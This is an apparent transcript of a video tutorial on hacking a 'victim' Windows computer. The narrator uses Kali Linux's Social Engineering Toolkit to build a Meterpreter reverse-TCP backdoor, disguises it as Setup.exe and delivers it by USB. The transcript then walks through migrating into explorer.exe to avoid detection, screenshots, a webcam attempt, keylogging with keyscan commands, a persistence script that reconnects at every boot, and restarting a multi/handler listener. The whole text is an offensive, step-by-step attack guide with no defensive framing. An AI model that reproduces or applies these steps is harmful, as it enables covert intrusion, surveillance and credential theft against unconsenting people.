Hi, today we're going to show you how to hack into a remote computer with Kali Linux and Social Engineering Toolkit. We're going to go into Kali Linux, Exploitation Tools, Social Engineering Toolkit, and then SE Toolkit. And here we are. On the command line here, we're going to choose Social Engineering Attacks, which is 1. And now 4, create payload and listener. Now you're gonna put in your local IP address. You might have to put in port forwarding for your router if you only have a local LAN IP. There's mine. Now Windows reverse TCP interpreter, that was number 2. Now number 16, the backdoor executable, that's the best. You can leave the port there. So now it's creating the executable. This takes a little bit here. If you want to start the listener now, you can say yes. Otherwise, you can start the listener later. We'll get into that later. So now the listener is loaded. That's good. So now we're going to send the executable to our victim. We're going to go to user, share, set, and the msf.exe is our exe. In the properties here, we're going to go to permissions, and on execute, we're going to allow to execute as a program. You can rename it whatever you want, really. Setup.exe will work well. Pretend it's going to set up something. Now we're going to put it on a USB drive, and we're going to send it over to the computer, the victim computer. So they're going to launch it, and on our VMware Kali Linux, you see that a session has opened. So here's your interpreter session. If we want to see a list of commands, you can type help, and you can take a look at all of these. There's all sorts of different things we can do. Do all sorts of cool stuff in here. First thing you want to do to make sure that your session stays open is we're going to migrate the process over to a different program. So type in PS and you can see all the processes that are running on that computer. And you're going to want to probably find one like explorer.exe. Look at the PID here, 3420. You're going to migrate to 3420. Now that makes it so that our reverse shell stays open by putting that process under a different exe memory space. Now if they close the thing where interpreter was hanging out, you won't lose it. So we're going to type screenshot, and it'll automatically save that right there to root. We can see that it named it a JPEG file. Let's go take a look at that. So we're gonna go to home, and there it is, right in our root. And there's a picture, a screenshot of that person's computer. Now, let's take a snapshot with their webcam. Well, actually, I'm using the webcam, so we can't really do that. It's not gonna work. How about a keylogger? How about keyscan underscore start? That starts the key sniffer. And we can go to Notepad. We'll go type whatever. Let's see. Hello, almost world. Not quite. Okay. hello world backspace. The keylogger should have recorded that. Let's take a look. Keyscan underscore dump, and there we see all my keys. Alright, keyscan underscore stop. We'll turn that sniffer off, you know. Another interesting command. Let's see. Why don't we go for run persistence. Now this will, every time they start their computer, -H. Every time they start their computer now, we want it to reopen the interpreter session. That -H just got me the help so I could make sure I have this right. Run persistence -U -I 5 -P 443 -R 192.168.122. What was it? I'll have to go find it. Ifconfig .128. There we go. So .128. Now persistent script. Okay. So it's gonna throw it into the auto run on that computer, and now it'll open the interpreter session whenever they start it up again. You know, you can make your own scripts in here if you want to, or you can mess around with all these awesome interpreter commands. If you close your listener and you want to get it back, or if you hadn't started in the beginning, do MSF console. That'll get us into the Metasploit console. And we want to start a listener. We're going to type use exploit / multi / handler. Okay. We're going to type set payload Windows interpreter / reverse TCP. We're going to set the local port 443. We're going to set the L host and then our IP address again. Come on. 168.122.128 and exploit. So it's going to start the handler, the listener pretty much, that takes the incoming. And there we go, we've got our session. So thanks for watching, and check out my Facebook and check out ultimatepeter.com.